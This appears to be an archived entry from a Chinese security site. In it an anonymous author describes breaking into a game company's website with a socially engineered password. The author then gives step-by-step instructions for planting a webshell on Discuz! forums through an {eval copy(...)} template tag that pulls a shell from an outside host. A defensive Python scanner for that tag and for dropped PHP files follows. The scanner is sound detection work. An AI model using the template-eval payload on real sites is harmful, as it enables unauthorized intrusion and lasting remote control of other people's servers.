Discuz! latest method to get a Webshell, tested and feasible - vulnerability warning - the black bar safety net

ID MYHACK58:62201026571
Type myhack58
Reporter Anonymous
Modified 2010-03-28T00:00:00


Discuz! latest method to get a Webshell, tested and feasible

I inadvertently broke into a game's official website but could not get a Webshell. Frustrated, I found that the site had a Discuz! forum, so I immediately tried the password I had already obtained, social-engineering style, and actually got into the backend! It was a 6.0+ version with the copyright notice removed by the administrator. The method known online, getting a shell by editing the template, was blocked because the template editing function was restricted, which made me very unhappy. Then I remembered the method of editing any template file and using eval to get the shell, and finally it worked!

The implementation steps follow. The method currently works on all DZ versions.

1. Pick a template file and select Edit.
2. Find a space to upload a webshell to; assume its address is <http://www.abc.com/shell.txt>.
3. At any position, enter: {eval copy('http://www.abc.com/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. Save and refresh.
5. Access the file the template belongs to.
6. Put the template back.

You're done. Access /forumdata/shell.php and there is your lovely horse (the webshell).
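A defender-side check for the edit described in the steps above, as an added example (not code from the original post or from Discuz!): it flags {eval} template tags that write files or reference remote URLs, and PHP files directly under forumdata that are missing from a known-good baseline, since step 6 restores the template but leaves the dropped file behind. The templates/**/*.htm layout, the function list and the baseline parameter are assumptions.

```python
import re
from pathlib import Path

# Discuz! template tag that runs raw PHP (the construct used in step 3).
# Non-greedy match: code containing "}" is cut short, but its prefix is still checked.
EVAL_TAG = re.compile(r"\{eval\s+(.*?)\}", re.S | re.I)
# Illustrative, non-exhaustive list of calls that write files or run/fetch content.
RISKY = re.compile(r"\b(copy|fopen|fwrite|file_put_contents|fsockopen|curl_exec|"
                   r"system|exec|passthru|shell_exec|assert|base64_decode)\s*\(", re.I)
REMOTE = re.compile(r"\b(?:https?|ftp)://", re.I)

# Constructed sample template: one benign tag, one shaped like the edit in step 3.
SAMPLE = """<div class="footer">
{eval $year = date('Y');}
{eval copy('http://files.example/a.txt', DISCUZ_ROOT.'./forumdata/a.php');}
</div>
"""

def scan_template(text):
    """Return (line_number, code) for each {eval} tag that writes files or pulls remote content."""
    hits = []
    for m in EVAL_TAG.finditer(text):
        code = m.group(1).strip()
        if RISKY.search(code) or REMOTE.search(code):
            hits.append((text.count("\n", 0, m.start()) + 1, code))
    return hits

def scan_tree(root, baseline=frozenset()):
    """Scan an install root: templates for risky {eval} tags, forumdata for unbaselined PHP.

    baseline holds POSIX-style relative paths of PHP files known to be legitimate
    (assumption: the operator recorded them from a clean install).
    """
    root = Path(root)
    findings = []
    for tpl in sorted(root.glob("templates/**/*.htm")):
        rel = tpl.relative_to(root).as_posix()
        for line, code in scan_template(tpl.read_text(errors="replace")):
            findings.append(("template-eval", rel, line, code))
    for php in sorted(root.glob("forumdata/*.php")):
        rel = php.relative_to(root).as_posix()
        if rel not in baseline:
            findings.append(("new-php", rel, 0, ""))
    return findings

if __name__ == "__main__":
    for hit in scan_template(SAMPLE):
        print(hit)
```

Run scan_tree on a schedule and on every admin template save; the template finding disappears once the template is restored, so the forumdata baseline check is the one that persists.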